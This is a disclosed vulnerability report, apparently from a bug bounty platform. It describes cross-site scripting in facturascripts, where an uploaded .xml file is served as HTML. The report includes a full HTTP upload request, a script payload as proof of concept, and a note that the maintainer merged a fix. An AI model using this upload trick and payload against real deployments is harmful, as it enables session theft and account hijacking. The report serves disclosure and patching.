Cross-site scripting - Reflected via upload `.xml` file in neorazorx/facturascripts

Valid

Reported on

Apr 30th 2022


Description

When user upload a file with .xml extension and direct access this file, the server response with Content-type: text/html lead to processing XML as HTML file.

Proof of Concept

POST /facturascripts/EditAttachedFile?code=1&action=save-ok HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------116175579928758251263819370629
Content-Length: 1356
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditAttachedFile?code=1&action=save-ok
Cookie: <web-cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="action"

insert
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="activetab"

EditAttachedFile
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="code"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="multireqtoken"

99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|4vnVMk
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="path"; filename="xss.xml"
Content-Type: text/xml

<script>alert(window.origin)</script>
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="filename"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="mimetype"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="size"

0
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="date"

2022-04-30
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="hour"

17:45:45
-----------------------------116175579928758251263819370629--

Step to reproduce

  1. Prepare a file xss.xml with content:
<script>alert(window.origin)</script>
  1. Upload xss.xml file in Admin -> Library

image

  1. Click download and XSS

image

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. 22 days ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back 21 days ago
Carlos Garcia validated this vulnerability 19 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia
18 days ago

Maintainer


Fixed here https://github.com/NeoRazorX/facturascripts/commit/31a6b6029cd95b2d64baac3d9209cc15e1f928e8

Carlos Garcia confirmed that a fix has been merged on 31a6b6 17 days ago
Carlos Garcia has been awarded the fix bounty
to join this conversation